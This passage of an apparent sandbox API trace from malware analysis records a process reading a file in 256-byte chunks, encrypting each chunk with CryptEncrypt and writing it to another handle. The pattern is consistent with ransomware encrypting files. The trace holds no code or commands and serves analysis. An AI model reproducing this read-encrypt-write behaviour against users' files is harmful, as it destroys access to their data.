returned 1 [0170.493] GetLastError () returned 0x0 [0170.493] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.493] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.493] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.493] GetLastError () returned 0x0 [0170.493] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.494] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.494] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.494] GetLastError () returned 0x0 [0170.494] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.494] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.494] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.494] GetLastError () returned 0x0 [0170.494] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.494] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.494] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.494] GetLastError () returned 0x0 [0170.494] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.494] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.494] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.494] GetLastError () returned 0x0 [0170.494] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.494] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.494] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.494] GetLastError () returned 0x0 [0170.494] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.495] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.495] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.495] GetLastError () returned 0x0 [0170.495] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.495] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.495] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.495] GetLastError () returned 0x0 [0170.495] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.495] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.495] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.495] GetLastError () returned 0x0 [0170.495] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.495] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.495] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.495] GetLastError () returned 0x0 [0170.495] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.495] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.495] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.496] GetLastError () returned 0x0 [0170.496] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.496] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.496] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.496] GetLastError () returned 0x0 [0170.496] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.496] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.496] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.496] GetLastError () returned 0x0 [0170.496] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.496] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.496] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.496] GetLastError () returned 0x0 [0170.496] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.496] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.496] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.496] GetLastError () returned 0x0 [0170.496] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.497] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.497] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.497] GetLastError () returned 0x0 [0170.497] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.497] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.497] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.497] GetLastError () returned 0x0 [0170.497] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.497] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.498] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.498] GetLastError () returned 0x0 [0170.498] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.498] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.498] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.498] GetLastError () returned 0x0 [0170.498] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.498] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.498] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.498] GetLastError () returned 0x0 [0170.498] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.498] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.498] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.498] GetLastError () returned 0x0 [0170.498] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.498] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.499] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.499] GetLastError () returned 0x0 [0170.499] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.499] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.499] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.499] GetLastError () returned 0x0 [0170.499] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.499] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.499] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.499] GetLastError () returned 0x0 [0170.499] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.499] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.499] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.499] GetLastError () returned 0x0 [0170.499] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.499] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.500] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.500] GetLastError () returned 0x0 [0170.500] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.500] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.500] GetLastError () returned 0x0 [0170.500] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.500] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.500] GetLastError () returned 0x0 [0170.500] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.500] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.500] GetLastError () returned 0x0 [0170.500] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.501] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.501] GetLastError () returned 0x0 [0170.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.501] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.501] GetLastError () returned 0x0 [0170.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.501] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, 